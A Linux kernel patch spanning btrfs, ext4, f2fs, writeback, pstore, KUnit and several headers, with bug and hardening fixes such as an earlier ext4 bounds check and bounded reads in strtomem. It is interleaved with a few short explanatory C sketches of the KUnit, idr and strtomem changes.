+@@ -2552,7 +2552,7 @@ out:
+ 
+ static noinline int search_ioctl(struct inode *inode,
+ 				 struct btrfs_ioctl_search_key *sk,
+-				 size_t *buf_size,
++				 u64 *buf_size,
+ 				 char __user *ubuf)
+ {
+ 	struct btrfs_fs_info *info = btrfs_sb(inode->i_sb);
+@@ -2625,7 +2625,7 @@ static noinline int btrfs_ioctl_tree_search(struct inode *inode,
+ 	struct btrfs_ioctl_search_args __user *uargs = argp;
+ 	struct btrfs_ioctl_search_key sk;
+ 	int ret;
+-	size_t buf_size;
++	u64 buf_size;
+ 
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EPERM;
+@@ -2655,8 +2655,8 @@ static noinline int btrfs_ioctl_tree_search_v2(struct inode *inode,
+ 	struct btrfs_ioctl_search_args_v2 __user *uarg = argp;
+ 	struct btrfs_ioctl_search_args_v2 args;
+ 	int ret;
+-	size_t buf_size;
+-	const size_t buf_limit = SZ_16M;
++	u64 buf_size;
++	const u64 buf_limit = SZ_16M;
+ 
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EPERM;
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index 1bb55a6d79c23..aa5aadd70bbc2 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -1010,6 +1010,11 @@ static int ext4_ext_insert_index(handle_t *handle, struct inode *inode,
+ 		ix = curp->p_idx;
+ 	}
+ 
++	if (unlikely(ix > EXT_MAX_INDEX(curp->p_hdr))) {
++		EXT4_ERROR_INODE(inode, "ix > EXT_MAX_INDEX!");
++		return -EFSCORRUPTED;
++	}
++
+ 	len = EXT_LAST_INDEX(curp->p_hdr) - ix + 1;
+ 	BUG_ON(len < 0);
+ 	if (len > 0) {
+@@ -1019,11 +1024,6 @@ static int ext4_ext_insert_index(handle_t *handle, struct inode *inode,
+ 		memmove(ix + 1, ix, len * sizeof(struct ext4_extent_idx));
+ 	}
+ 
+-	if (unlikely(ix > EXT_MAX_INDEX(curp->p_hdr))) {
+-		EXT4_ERROR_INODE(inode, "ix > EXT_MAX_INDEX!");
+-		return -EFSCORRUPTED;
+-	}
+-
+ 	ix->ei_block = cpu_to_le32(logical);
+ 	ext4_idx_store_pblock(ix, ptr);
+ 	le16_add_cpu(&curp->p_hdr->eh_entries, 1);
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index a982f91b71eb2..ea05710ca9bdf 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -2263,8 +2263,10 @@ skip_reading_dnode:
+ 		f2fs_wait_on_block_writeback(inode, blkaddr);
+ 
+ 		if (f2fs_load_compressed_page(sbi, page, blkaddr)) {
+-			if (atomic_dec_and_test(&dic->remaining_pages))
++			if (atomic_dec_and_test(&dic->remaining_pages)) {
+ 				f2fs_decompress_cluster(dic, true);
++				break;
++			}
+ 			continue;
+ 		}
+ 
+@@ -2950,7 +2952,9 @@ static int f2fs_write_cache_pages(struct address_space *mapping,
+ {
+ 	int ret = 0;
+ 	int done = 0, retry = 0;
+-	struct page *pages[F2FS_ONSTACK_PAGES];
++	struct page *pages_local[F2FS_ONSTACK_PAGES];
++	struct page **pages = pages_local;
++	struct folio_batch fbatch;
+ 	struct f2fs_sb_info *sbi = F2FS_M_SB(mapping);
+ 	struct bio *bio = NULL;
+ 	sector_t last_block;
+@@ -2971,7 +2975,9 @@ static int f2fs_write_cache_pages(struct address_space *mapping,
+ 		.private = NULL,
+ 	};
+ #endif
++	int nr_folios, p, idx;
+ 	int nr_pages;
++	unsigned int max_pages = F2FS_ONSTACK_PAGES;
+ 	pgoff_t index;
+ 	pgoff_t end;		/* Inclusive */
+ 	pgoff_t done_index;
+@@ -2981,6 +2987,17 @@ static int f2fs_write_cache_pages(struct address_space *mapping,
+ 	int submitted = 0;
+ 	int i;
+ 
++#ifdef CONFIG_F2FS_FS_COMPRESSION
++	if (f2fs_compressed_file(inode) &&
++		1 << cc.log_cluster_size > F2FS_ONSTACK_PAGES) {
++		pages = f2fs_kzalloc(sbi, sizeof(struct page *) <<
++				cc.log_cluster_size, GFP_NOFS | __GFP_NOFAIL);
++		max_pages = 1 << cc.log_cluster_size;
++	}
++#endif
++
++	folio_batch_init(&fbatch);
++
+ 	if (get_dirty_pages(mapping->host) <=
+ 				SM_I(F2FS_M_SB(mapping))->min_hot_blocks)
+ 		set_inode_flag(mapping->host, FI_HOT_DATA);
+@@ -3006,13 +3023,38 @@ retry:
+ 		tag_pages_for_writeback(mapping, index, end);
+ 	done_index = index;
+ 	while (!done && !retry && (index <= end)) {
+-		nr_pages = find_get_pages_range_tag(mapping, &index, end,
+-				tag, F2FS_ONSTACK_PAGES, pages);
+-		if (nr_pages == 0)
++		nr_pages = 0;
++again:
++		nr_folios = filemap_get_folios_tag(mapping, &index, end,
++				tag, &fbatch);
++		if (nr_folios == 0) {
++			if (nr_pages)
++				goto write;
+ 			break;
++		}
+ 
++		for (i = 0; i < nr_folios; i++) {
++			struct folio *folio = fbatch.folios[i];
++
++			idx = 0;
++			p = folio_nr_pages(folio);
++add_more:
++			pages[nr_pages] = folio_page(folio, idx);
++			folio_get(folio);
++			if (++nr_pages == max_pages) {
++				index = folio->index + idx + 1;
++				folio_batch_release(&fbatch);
++				goto write;
++			}
++			if (++idx < p)
++				goto add_more;
++		}
++		folio_batch_release(&fbatch);
++		goto again;
++write:
+ 		for (i = 0; i < nr_pages; i++) {
+ 			struct page *page = pages[i];
++			struct folio *folio = page_folio(page);
+ 			bool need_readd;
+ readd:
+ 			need_readd = false;
+@@ -3029,7 +3071,7 @@ readd:
+ 				}
+ 
+ 				if (!f2fs_cluster_can_merge_page(&cc,
+-								page->index)) {
++								folio->index)) {
+ 					ret = f2fs_write_multi_pages(&cc,
+ 						&submitted, wbc, io_type);
+ 					if (!ret)
+@@ -3038,27 +3080,28 @@ readd:
+ 				}
+ 
+ 				if (unlikely(f2fs_cp_error(sbi)))
+-					goto lock_page;
++					goto lock_folio;
+ 
+ 				if (!f2fs_cluster_is_empty(&cc))
+-					goto lock_page;
++					goto lock_folio;
+ 
+ 				if (f2fs_all_cluster_page_ready(&cc,
+ 					pages, i, nr_pages, true))
+-					goto lock_page;
++					goto lock_folio;
+ 
+ 				ret2 = f2fs_prepare_compress_overwrite(
+ 							inode, &pagep,
+-							page->index, &fsdata);
++							folio->index, &fsdata);
+ 				if (ret2 < 0) {
+ 					ret = ret2;
+ 					done = 1;
+ 					break;
+ 				} else if (ret2 &&
+ 					(!f2fs_compress_write_end(inode,
+-						fsdata, page->index, 1) ||
++						fsdata, folio->index, 1) ||
+ 					 !f2fs_all_cluster_page_ready(&cc,
+-						pages, i, nr_pages, false))) {
++						pages, i, nr_pages,
++						false))) {
+ 					retry = 1;
+ 					break;
+ 				}
+@@ -3071,46 +3114,47 @@ readd:
+ 				break;
+ 			}
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+-lock_page:
++lock_folio:
+ #endif
+-			done_index = page->index;
++			done_index = folio->index;
+ retry_write:
+-			lock_page(page);
++			folio_lock(folio);
+ 
+-			if (unlikely(page->mapping != mapping)) {
++			if (unlikely(folio->mapping != mapping)) {
+ continue_unlock:
+-				unlock_page(page);
++				folio_unlock(folio);
+ 				continue;
+ 			}
+ 
+-			if (!PageDirty(page)) {
++			if (!folio_test_dirty(folio)) {
+ 				/* someone wrote it for us */
+ 				goto continue_unlock;
+ 			}
+ 
+-			if (PageWriteback(page)) {
++			if (folio_test_writeback(folio)) {
+ 				if (wbc->sync_mode != WB_SYNC_NONE)
+-					f2fs_wait_on_page_writeback(page,
++					f2fs_wait_on_page_writeback(
++							&folio->page,
+ 							DATA, true, true);
+ 				else
+ 					goto continue_unlock;
+ 			}
+ 
+-			if (!clear_page_dirty_for_io(page))
++			if (!folio_clear_dirty_for_io(folio))
+ 				goto continue_unlock;
+ 
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+ 			if (f2fs_compressed_file(inode)) {
+-				get_page(page);
+-				f2fs_compress_ctx_add_page(&cc, page);
++				folio_get(folio);
++				f2fs_compress_ctx_add_page(&cc, &folio->page);
+ 				continue;
+ 			}
+ #endif
+-			ret = f2fs_write_single_data_page(page, &submitted,
+-					&bio, &last_block, wbc, io_type,
+-					0, true);
++			ret = f2fs_write_single_data_page(&folio->page,
++					&submitted, &bio, &last_block,
++					wbc, io_type, 0, true);
+ 			if (ret == AOP_WRITEPAGE_ACTIVATE)
+-				unlock_page(page);
++				folio_unlock(folio);
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+ result:
+ #endif
+@@ -3134,7 +3178,8 @@ result:
+ 					}
+ 					goto next;
+ 				}
+-				done_index = page->index + 1;
++				done_index = folio->index +
++					folio_nr_pages(folio);
+ 				done = 1;
+ 				break;
+ 			}
+@@ -3182,6 +3227,11 @@ next:
+ 	if (bio)
+ 		f2fs_submit_merged_ipu_write(sbi, &bio, NULL);
+ 
++#ifdef CONFIG_F2FS_FS_COMPRESSION
++	if (pages != pages_local)
++		kfree(pages);
++#endif
++
+ 	return ret;
+ }
+ 
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 746c71716bead..d0c17366ebf48 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -3249,6 +3249,7 @@ int f2fs_precache_extents(struct inode *inode)
+ 		return -EOPNOTSUPP;
+ 
+ 	map.m_lblk = 0;
++	map.m_pblk = 0;
+ 	map.m_next_pgofs = NULL;
+ 	map.m_next_extent = &m_next_extent;
+ 	map.m_seg_type = NO_CHECK_TYPE;
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 2046f633fe57a..1ba85ef97cbd3 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -548,6 +548,29 @@ static int f2fs_set_test_dummy_encryption(struct super_block *sb,
+ }
+ 
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
++static bool is_compress_extension_exist(struct f2fs_sb_info *sbi,
++					const char *new_ext, bool is_ext)
++{
++	unsigned char (*ext)[F2FS_EXTENSION_LEN];
++	int ext_cnt;
++	int i;
++
++	if (is_ext) {
++		ext = F2FS_OPTION(sbi).extensions;
++		ext_cnt = F2FS_OPTION(sbi).compress_ext_cnt;
++	} else {
++		ext = F2FS_OPTION(sbi).noextensions;
++		ext_cnt = F2FS_OPTION(sbi).nocompress_ext_cnt;
++	}
++
++	for (i = 0; i < ext_cnt; i++) {
++		if (!strcasecmp(new_ext, ext[i]))
++			return true;
++	}
++
++	return false;
++}
++
+ /*
+  * 1. The same extension name cannot appear in both the compress and non-compress extension
+  * at the same time.
+@@ -1145,6 +1168,11 @@ static int parse_options(struct super_block *sb, char *options, bool is_remount)
+ 				return -EINVAL;
+ 			}
+ 
++			if (is_compress_extension_exist(sbi, name, true)) {
++				kfree(name);
++				break;
++			}
++
+ 			strcpy(ext[ext_cnt], name);
+ 			F2FS_OPTION(sbi).compress_ext_cnt++;
+ 			kfree(name);
+@@ -1169,6 +1197,11 @@ static int parse_options(struct super_block *sb, char *options, bool is_remount)
+ 				return -EINVAL;
+ 			}
+ 
++			if (is_compress_extension_exist(sbi, name, false)) {
++				kfree(name);
++				break;
++			}
++
+ 			strcpy(noext[noext_cnt], name);
+ 			F2FS_OPTION(sbi).nocompress_ext_cnt++;
+ 			kfree(name);
+diff --git a/fs/fs-writeback.c b/fs/fs-writeback.c
+index a5c31a479aacc..be2d329843d44 100644
+--- a/fs/fs-writeback.c
++++ b/fs/fs-writeback.c
+@@ -611,6 +611,24 @@ out_free:
+ 	kfree(isw);
+ }
+ 
++static bool isw_prepare_wbs_switch(struct inode_switch_wbs_context *isw,
++				   struct list_head *list, int *nr)
++{
++	struct inode *inode;
++
++	list_for_each_entry(inode, list, i_io_list) {
++		if (!inode_prepare_wbs_switch(inode, isw->new_wb))
++			continue;
++
++		isw->inodes[*nr] = inode;
++		(*nr)++;
++
++		if (*nr >= WB_MAX_INODES_PER_ISW - 1)
++			return true;
++	}
++	return false;
++}
++
+ /**
+  * cleanup_offline_cgwb - detach associated inodes
+  * @wb: target wb
+@@ -623,7 +641,6 @@ bool cleanup_offline_cgwb(struct bdi_writeback *wb)
+ {
+ 	struct cgroup_subsys_state *memcg_css;
+ 	struct inode_switch_wbs_context *isw;
+-	struct inode *inode;
+ 	int nr;
+ 	bool restart = false;
+ 
+@@ -645,17 +662,17 @@ bool cleanup_offline_cgwb(struct bdi_writeback *wb)
+ 
+ 	nr = 0;
+ 	spin_lock(&wb->list_lock);
+-	list_for_each_entry(inode, &wb->b_attached, i_io_list) {
+-		if (!inode_prepare_wbs_switch(inode, isw->new_wb))
+-			continue;
+-
+-		isw->inodes[nr++] = inode;
+-
+-		if (nr >= WB_MAX_INODES_PER_ISW - 1) {
+-			restart = true;
+-			break;
+-		}
+-	}
++	/*
++	 * In addition to the inodes that have completed writeback, also switch
++	 * cgwbs for those inodes with only dirty timestamps. Otherwise, those
++	 * inodes won't be written back for a long time when lazytime is
++	 * enabled, thus pinning the dying cgwbs. It won't break the
++	 * bandwidth restrictions, as writeback of inode metadata is not
++	 * accounted for.
++	 */
++	restart = isw_prepare_wbs_switch(isw, &wb->b_attached, &nr);
++	if (!restart)
++		restart = isw_prepare_wbs_switch(isw, &wb->b_dirty_time, &nr);
+ 	spin_unlock(&wb->list_lock);
+ 
+ 	/* no attached inodes? bail out */
+diff --git a/fs/pstore/platform.c b/fs/pstore/platform.c
+index 0c034ea399547..7787fb544621c 100644
+--- a/fs/pstore/platform.c
++++ b/fs/pstore/platform.c
+@@ -561,6 +561,8 @@ out:
+  */
+ int pstore_register(struct pstore_info *psi)
+ {
++	char *new_backend;
++
+ 	if (backend && strcmp(backend, psi->name)) {
+ 		pr_warn("ignoring unexpected backend '%s'\n", psi->name);
+ 		return -EPERM;
+@@ -580,11 +582,16 @@ int pstore_register(struct pstore_info *psi)
+ 		return -EINVAL;
+ 	}
+ 
++	new_backend = kstrdup(psi->name, GFP_KERNEL);
++	if (!new_backend)
++		return -ENOMEM;
++
+ 	mutex_lock(&psinfo_lock);
+ 	if (psinfo) {
+ 		pr_warn("backend '%s' already loaded: ignoring '%s'\n",
+ 			psinfo->name, psi->name);
+ 		mutex_unlock(&psinfo_lock);
++		kfree(new_backend);
+ 		return -EBUSY;
+ 	}
+ 
+@@ -617,7 +624,7 @@ int pstore_register(struct pstore_info *psi)
+ 	 * Update the module parameter backend, so it is visible
+ 	 * through /sys/module/pstore/parameters/backend
+ 	 */
+-	backend = kstrdup(psi->name, GFP_KERNEL);
++	backend = new_backend;
+ 
+ 	pr_info("Registered %s as persistent store backend\n", psi->name);
+ 
+diff --git a/include/kunit/visibility.h b/include/kunit/visibility.h
+new file mode 100644
+index 0000000000000..0dfe35feeec60
+--- /dev/null
++++ b/include/kunit/visibility.h
+@@ -0,0 +1,33 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * KUnit API to allow symbols to be conditionally visible during KUnit
++ * testing
++ *
++ * Copyright (C) 2022, Google LLC.
++ * Author: Rae Moar <rmoar@google.com>
++ */
++
++#ifndef _KUNIT_VISIBILITY_H
++#define _KUNIT_VISIBILITY_H
++
++#if IS_ENABLED(CONFIG_KUNIT)
++    /**
++     * VISIBLE_IF_KUNIT - A macro that makes a symbol static if
++     * CONFIG_KUNIT is not enabled, and leaves the symbol definition
++     * unchanged if CONFIG_KUNIT is enabled.
++     */
++    #define VISIBLE_IF_KUNIT
++    /**
++     * EXPORT_SYMBOL_IF_KUNIT(symbol) - Exports symbol into
++     * EXPORTED_FOR_KUNIT_TESTING namespace only if CONFIG_KUNIT is
++     * enabled. The test file must use MODULE_IMPORT_NS(EXPORTED_FOR_KUNIT_TESTING)
++     * in order to use such symbols.
++     */
++    #define EXPORT_SYMBOL_IF_KUNIT(symbol) EXPORT_SYMBOL_NS(symbol, \
++	    EXPORTED_FOR_KUNIT_TESTING)
++#else
++    #define VISIBLE_IF_KUNIT static
++    #define EXPORT_SYMBOL_IF_KUNIT(symbol)
++#endif
++
++#endif /* _KUNIT_VISIBILITY_H */
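
For context, a hedged usage sketch of the two macros defined above; the file and symbol names (foo.c, foo_internal_helper) are illustrative only and not part of this patch:

#include <kunit/visibility.h>

/*
 * Usage sketch: in the implementation file, the symbol is static in
 * production builds and exported into the test-only namespace when
 * CONFIG_KUNIT is enabled.
 */
VISIBLE_IF_KUNIT int foo_internal_helper(int x)
{
	return x * 2;
}
EXPORT_SYMBOL_IF_KUNIT(foo_internal_helper);

/*
 * The corresponding test module must import the namespace before it
 * can call the helper:
 *
 *	MODULE_IMPORT_NS(EXPORTED_FOR_KUNIT_TESTING);
 */
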
+diff --git a/include/linux/clk-provider.h b/include/linux/clk-provider.h
+index aefb06373720f..15e336281d1f4 100644
+--- a/include/linux/clk-provider.h
++++ b/include/linux/clk-provider.h
+@@ -72,7 +72,7 @@ void clk_hw_forward_rate_request(const struct clk_hw *core,
+ 				 unsigned long parent_rate);
+ 
+ /**
+- * struct clk_duty - Struture encoding the duty cycle ratio of a clock
++ * struct clk_duty - Structure encoding the duty cycle ratio of a clock
+  *
+  * @num:	Numerator of the duty cycle ratio
+  * @den:	Denominator of the duty cycle ratio
+@@ -127,7 +127,7 @@ struct clk_duty {
+  * @restore_context: Restore the context of the clock after a restoration
+  *		of power.
+  *
+- * @recalc_rate	Recalculate the rate of this clock, by querying hardware. The
++ * @recalc_rate: Recalculate the rate of this clock, by querying hardware. The
+  *		parent rate is an input parameter.  It is up to the caller to
+  *		ensure that the prepare_mutex is held across this call. If the
+  *		driver cannot figure out a rate for this clock, it must return
+@@ -454,7 +454,7 @@ struct clk *clk_register_fixed_rate(struct device *dev, const char *name,
+  * clock with the clock framework
+  * @dev: device that is registering this clock
+  * @name: name of this clock
+- * @parent_name: name of clock's parent
++ * @parent_data: name of clock's parent
+  * @flags: framework-specific flags
+  * @fixed_rate: non-adjustable clock rate
+  * @fixed_accuracy: non-adjustable clock accuracy
+@@ -469,7 +469,7 @@ struct clk *clk_register_fixed_rate(struct device *dev, const char *name,
+  * the clock framework
+  * @dev: device that is registering this clock
+  * @name: name of this clock
+- * @parent_name: name of clock's parent
++ * @parent_data: name of clock's parent
+  * @flags: framework-specific flags
+  * @fixed_rate: non-adjustable clock rate
+  */
+@@ -628,7 +628,7 @@ struct clk_div_table {
+  * Clock with an adjustable divider affecting its output frequency.  Implements
+  * .recalc_rate, .set_rate and .round_rate
+  *
+- * Flags:
++ * @flags:
+  * CLK_DIVIDER_ONE_BASED - by default the divisor is the value read from the
+  *	register plus one.  If CLK_DIVIDER_ONE_BASED is set then the divider is
+  *	the raw value read from the register, with the value of zero considered
+@@ -1109,11 +1109,12 @@ struct clk_hw *clk_hw_register_fixed_factor_parent_hw(struct device *dev,
+  * @mwidth:	width of the numerator bit field
+  * @nshift:	shift to the denominator bit field
+  * @nwidth:	width of the denominator bit field
++ * @approximation: clk driver's callback for calculating the divider clock
+  * @lock:	register lock
+  *
+  * Clock with adjustable fractional divider affecting its output frequency.
+  *
+- * Flags:
++ * @flags:
+  * CLK_FRAC_DIVIDER_ZERO_BASED - by default the numerator and denominator
+  *	is the value read from the register. If CLK_FRAC_DIVIDER_ZERO_BASED
+  *	is set then the numerator and denominator are both the value read
+@@ -1172,7 +1173,7 @@ void clk_hw_unregister_fractional_divider(struct clk_hw *hw);
+  * Clock with an adjustable multiplier affecting its output frequency.
+  * Implements .recalc_rate, .set_rate and .round_rate
+  *
+- * Flags:
++ * @flags:
+  * CLK_MULTIPLIER_ZERO_BYPASS - By default, the multiplier is the value read
+  *	from the register, with 0 being a valid value effectively
+  *	zeroing the output clock rate. If CLK_MULTIPLIER_ZERO_BYPASS is
+diff --git a/include/linux/cpuhotplug.h b/include/linux/cpuhotplug.h
+index 2be2091c2b447..c7e0d80dbf6a5 100644
+--- a/include/linux/cpuhotplug.h
++++ b/include/linux/cpuhotplug.h
+@@ -191,6 +191,7 @@ enum cpuhp_state {
+ 	/* Must be the last timer callback */
+ 	CPUHP_AP_DUMMY_TIMER_STARTING,
+ 	CPUHP_AP_ARM_XEN_STARTING,
++	CPUHP_AP_ARM_XEN_RUNSTATE_STARTING,
+ 	CPUHP_AP_ARM_CORESIGHT_STARTING,
+ 	CPUHP_AP_ARM_CORESIGHT_CTI_STARTING,
+ 	CPUHP_AP_ARM64_ISNDEP_STARTING,
+diff --git a/include/linux/hisi_acc_qm.h b/include/linux/hisi_acc_qm.h
+index c3618255b1504..41203ce27d64c 100644
+--- a/include/linux/hisi_acc_qm.h
++++ b/include/linux/hisi_acc_qm.h
+@@ -145,6 +145,13 @@ enum qm_vf_state {
+ 	QM_NOT_READY,
+ };
+ 
++enum qm_misc_ctl_bits {
++	QM_DRIVER_REMOVING = 0x0,
++	QM_RST_SCHED,
++	QM_RESETTING,
++	QM_MODULE_PARAM,
++};
++
+ enum qm_cap_bits {
+ 	QM_SUPPORT_DB_ISOLATION = 0x0,
+ 	QM_SUPPORT_FUNC_QOS,
+@@ -471,11 +478,11 @@ int hisi_qm_sriov_disable(struct pci_dev *pdev, bool is_frozen);
+ int hisi_qm_sriov_configure(struct pci_dev *pdev, int num_vfs);
+ void hisi_qm_dev_err_init(struct hisi_qm *qm);
+ void hisi_qm_dev_err_uninit(struct hisi_qm *qm);
+-int hisi_qm_diff_regs_init(struct hisi_qm *qm,
+-		struct dfx_diff_registers *dregs, int reg_len);
+-void hisi_qm_diff_regs_uninit(struct hisi_qm *qm, int reg_len);
++int hisi_qm_regs_debugfs_init(struct hisi_qm *qm,
++			  struct dfx_diff_registers *dregs, u32 reg_len);
++void hisi_qm_regs_debugfs_uninit(struct hisi_qm *qm, u32 reg_len);
+ void hisi_qm_acc_diff_regs_dump(struct hisi_qm *qm, struct seq_file *s,
+-		struct dfx_diff_registers *dregs, int regs_len);
++				struct dfx_diff_registers *dregs, u32 regs_len);
+ 
+ pci_ers_result_t hisi_qm_dev_err_detected(struct pci_dev *pdev,
+ 					  pci_channel_state_t state);
+diff --git a/include/linux/hw_random.h b/include/linux/hw_random.h
+index 77c2885c4c130..2505d58bd5829 100644
+--- a/include/linux/hw_random.h
++++ b/include/linux/hw_random.h
+@@ -63,5 +63,6 @@ extern void hwrng_unregister(struct hwrng *rng);
+ extern void devm_hwrng_unregister(struct device *dve, struct hwrng *rng);
+ 
+ extern long hwrng_msleep(struct hwrng *rng, unsigned int msecs);
++extern long hwrng_yield(struct hwrng *rng);
+ 
+ #endif /* LINUX_HWRANDOM_H_ */
+diff --git a/include/linux/idr.h b/include/linux/idr.h
+index a0dce14090a9e..da5f5fa4a3a6a 100644
+--- a/include/linux/idr.h
++++ b/include/linux/idr.h
+@@ -200,7 +200,7 @@ static inline void idr_preload_end(void)
+  */
+ #define idr_for_each_entry_ul(idr, entry, tmp, id)			\
+ 	for (tmp = 0, id = 0;						\
+-	     tmp <= id && ((entry) = idr_get_next_ul(idr, &(id))) != NULL; \
++	     ((entry) = tmp <= id ? idr_get_next_ul(idr, &(id)) : NULL) != NULL; \
+ 	     tmp = id, ++id)
+ 
+ /**
+@@ -224,10 +224,12 @@ static inline void idr_preload_end(void)
+  * @id: Entry ID.
+  *
+  * Continue to iterate over entries, continuing after the current position.
++ * After normal termination @entry is left with the value NULL.  This
++ * is convenient for a "not found" value.
+  */
+ #define idr_for_each_entry_continue_ul(idr, entry, tmp, id)		\
+ 	for (tmp = id;							\
+-	     tmp <= id && ((entry) = idr_get_next_ul(idr, &(id))) != NULL; \
++	     ((entry) = tmp <= id ? idr_get_next_ul(idr, &(id)) : NULL) != NULL; \
+ 	     tmp = id, ++id)
+ 
+ /*
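
The point of moving the "tmp <= id" guard inside the assignment is that the cursor is reliably NULL once iteration ends, including on ID wraparound, instead of dangling on the last visited entry. A standalone userspace analogue of that loop shape, assuming a toy get_next() in place of idr_get_next_ul():

#include <stdio.h>

/*
 * Standalone analogue of the fixed loop: the wraparound guard is
 * evaluated inside the assignment, so the cursor is NULL after the
 * walk terminates rather than pointing at the last entry.
 */
static int table[3] = { 10, 20, 30 };

static int *get_next(unsigned long *id)	/* stand-in for idr_get_next_ul() */
{
	return (*id < 3) ? &table[*id] : NULL;
}

#define for_each_entry(entry, tmp, id)					\
	for (tmp = 0, id = 0;						\
	     ((entry) = tmp <= id ? get_next(&(id)) : NULL) != NULL;	\
	     tmp = id, ++id)

int main(void)
{
	unsigned long tmp, id;
	int *entry;

	for_each_entry(entry, tmp, id)
		printf("id=%lu val=%d\n", id, *entry);

	/* entry is NULL here, a ready-made "not found" result */
	printf("after loop: entry=%p\n", (void *)entry);
	return 0;
}
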
+diff --git a/include/linux/mfd/core.h b/include/linux/mfd/core.h
+index 0bc7cba798a34..b449765b5cac1 100644
+--- a/include/linux/mfd/core.h
++++ b/include/linux/mfd/core.h
+@@ -92,7 +92,7 @@ struct mfd_cell {
+ 	 * (above) when matching OF nodes with devices that have identical
+ 	 * compatible strings
+ 	 */
+-	const u64 of_reg;
++	u64 of_reg;
+ 
+ 	/* Set to 'true' to use 'of_reg' (above) - allows for of_reg=0 */
+ 	bool use_of_reg;
+diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
+index 5a04fbf724768..0373e09359905 100644
+--- a/include/linux/netdevice.h
++++ b/include/linux/netdevice.h
+@@ -5190,5 +5190,6 @@ extern struct net_device *blackhole_netdev;
+ #define DEV_STATS_INC(DEV, FIELD) atomic_long_inc(&(DEV)->stats.__##FIELD)
+ #define DEV_STATS_ADD(DEV, FIELD, VAL) 	\
+ 		atomic_long_add((VAL), &(DEV)->stats.__##FIELD)
++#define DEV_STATS_READ(DEV, FIELD) atomic_long_read(&(DEV)->stats.__##FIELD)
+ 
+ #endif	/* _LINUX_NETDEVICE_H */
+diff --git a/include/linux/numa.h b/include/linux/numa.h
+index 59df211d051fa..0f512c0aba54b 100644
+--- a/include/linux/numa.h
++++ b/include/linux/numa.h
+@@ -12,6 +12,7 @@
+ #define MAX_NUMNODES    (1 << NODES_SHIFT)
+ 
+ #define	NUMA_NO_NODE	(-1)
++#define	NUMA_NO_MEMBLK	(-1)
+ 
+ /* optionally keep NUMA memory info available post init */
+ #ifdef CONFIG_NUMA_KEEP_MEMINFO
+@@ -43,6 +44,12 @@ static inline int phys_to_target_node(u64 start)
+ 	return 0;
+ }
+ #endif
++#ifndef numa_fill_memblks
++static inline int __init numa_fill_memblks(u64 start, u64 end)
++{
++	return NUMA_NO_MEMBLK;
++}
++#endif
+ #else /* !CONFIG_NUMA */
+ static inline int numa_map_to_online_node(int node)
+ {
+diff --git a/include/linux/pagemap.h b/include/linux/pagemap.h
+index bbccb40442224..03307b72de6c6 100644
+--- a/include/linux/pagemap.h
++++ b/include/linux/pagemap.h
+@@ -720,6 +720,8 @@ unsigned filemap_get_folios(struct address_space *mapping, pgoff_t *start,
+ 		pgoff_t end, struct folio_batch *fbatch);
+ unsigned filemap_get_folios_contig(struct address_space *mapping,
+ 		pgoff_t *start, pgoff_t end, struct folio_batch *fbatch);
++unsigned filemap_get_folios_tag(struct address_space *mapping, pgoff_t *start,
++		pgoff_t end, xa_mark_t tag, struct folio_batch *fbatch);
+ unsigned find_get_pages_range_tag(struct address_space *mapping, pgoff_t *index,
+ 			pgoff_t end, xa_mark_t tag, unsigned int nr_pages,
+ 			struct page **pages);
+diff --git a/include/linux/string.h b/include/linux/string.h
+index cf7607b321027..26ab8928d8661 100644
+--- a/include/linux/string.h
++++ b/include/linux/string.h
+@@ -276,10 +276,12 @@ void memcpy_and_pad(void *dest, size_t dest_len, const void *src, size_t count,
+  */
+ #define strtomem_pad(dest, src, pad)	do {				\
+ 	const size_t _dest_len = __builtin_object_size(dest, 1);	\
++	const size_t _src_len = __builtin_object_size(src, 1);		\
+ 									\
+ 	BUILD_BUG_ON(!__builtin_constant_p(_dest_len) ||		\
+ 		     _dest_len == (size_t)-1);				\
+-	memcpy_and_pad(dest, _dest_len, src, strnlen(src, _dest_len), pad); \
++	memcpy_and_pad(dest, _dest_len, src,				\
++		       strnlen(src, min(_src_len, _dest_len)), pad);	\
+ } while (0)
+ 
+ /**
+@@ -297,10 +299,11 @@ void memcpy_and_pad(void *dest, size_t dest_len, const void *src, size_t count,
+  */
+ #define strtomem(dest, src)	do {					\
+ 	const size_t _dest_len = __builtin_object_size(dest, 1);	\
++	const size_t _src_len = __builtin_object_size(src, 1);		\
+ 									\
+ 	BUILD_BUG_ON(!__builtin_constant_p(_dest_len) ||		\
+ 		     _dest_len == (size_t)-1);				\
+-	memcpy(dest, src, min(_dest_len, strnlen(src, _dest_len)));	\
++	memcpy(dest, src, strnlen(src, min(_src_len, _dest_len)));	\
+ } while (0)
+ 
+ /**
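
The change above bounds strnlen() by the smaller of the source and destination object sizes, so a short, non-NUL-terminated source can no longer be scanned past its end. A minimal userspace sketch of the same clamp (plain C, not the kernel macro itself):

#include <stdio.h>
#include <string.h>

/*
 * "src" below is deliberately not NUL-terminated; bounding the scan
 * by dest_len alone (the old behaviour) would read past it.
 */
int main(void)
{
	char src[4] = { 'a', 'b', 'c', 'd' };	/* no trailing NUL */
	char dest[8] = { 0 };
	size_t src_len = sizeof(src);
	size_t dest_len = sizeof(dest);
	size_t n = strnlen(src, src_len < dest_len ? src_len : dest_len);

	memcpy(dest, src, n);	/* copies 4 bytes, no over-read */
	printf("copied %zu bytes: %.8s\n", n, dest);
	return 0;
}
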
+diff --git a/include/linux/verification.h b/include/linux/verification.h
+index f34e50ebcf60a..cb2d47f280910 100644
+--- a/include/linux/verification.h
++++ b/include/linux/verification.h
+@@ -8,6 +8,7 @@
+ #ifndef _LINUX_VERIFICATION_H
+ #define _LINUX_VERIFICATION_H
+ 
++#include <linux/errno.h>
+ #include <linux/types.h>
+ 
+ /*
